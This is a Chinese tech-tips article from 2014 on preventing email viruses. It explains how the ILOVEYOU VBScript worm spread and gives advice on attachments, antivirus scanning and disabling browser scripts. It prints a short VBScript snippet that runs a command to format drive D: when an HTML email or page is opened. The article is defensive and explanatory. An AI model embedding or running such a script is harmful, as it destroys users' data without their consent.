快压

当前位置:首页 > 电脑技巧 > 正文

网络上的病毒该怎么防范呢

浏览次数:|更新日期:2014年12月09日

网络病毒通常是指特洛伊木马和邮件病毒,因为是通过网络传播的,所以称为“网络病毒”。 在这里面我说说邮件病毒。
  邮件病毒和普通病毒是一样的,只不过由于它们主要通过电子邮件传播,所以才称为“邮件病毒”,一般通过邮件中“附件”夹带的方法进行扩散,一旦你收到这类E-mail,运行了附件中的病毒程序,就能使你的电脑染毒。这类病毒本身的代码并不复杂,大都是一些脚本,比如I love you病毒,就是一个用VB s cript编写的仅十几kB的脚本文件,只要收到该病毒的E-mail并打开附件后,病毒就会按照脚本指令,将浏览器自动连接上一个网址,下载木马程序,更改一些文件后缀为.vbs,最后再把病毒自动发给Outlook通讯簿中的每个人。
  还有一种恶作剧需要提醒大家注意,有人用VBs cript编写了一个HTML文件,代码如下:
  
  Dim WSHShell
  set WSHShell=CreateObject (“”Ws cript.Shell””)
  WSHShell.run(“”c:format d:””)
  

  只要你打开该网页,你的D盘就被格式化了。如果哪天你收到的E-mail,其中整合有这样的HTML,只要你一打开该E-mail,就会自动启动IE,运行以上HTML代码,根本不需要你打开E-mail的附件,你的D盘就会被格式化。预防办法是禁止HTML中脚本的运行(在浏览器的“工具”/Internet选项/安全中设置禁止JAVA或ActiveX的运行),当IE提示“该页上的某个软件(ActiveX控件)可能不安全,建议你不要运行。是否允许运行?”时千万要记住选择“不运行”,以免你的硬盘被格式化!
  要防范邮件病毒,就要注意不要打开陌生人来信中的附件,特别是“.exe”等可执行文件;养成用最新杀毒软件及时查毒的好习惯,对附件中的文件不要打开,先保存在特定目录中,然后用杀毒软件进行检查;收到自认为有趣的邮件时,不要盲目转发,因为这样会帮助病毒的传播;对于通过脚本“工作”的病毒,可以采用在浏览器中禁止JAVA或ActiveX运行的方法来阻止病毒的发作。
  ”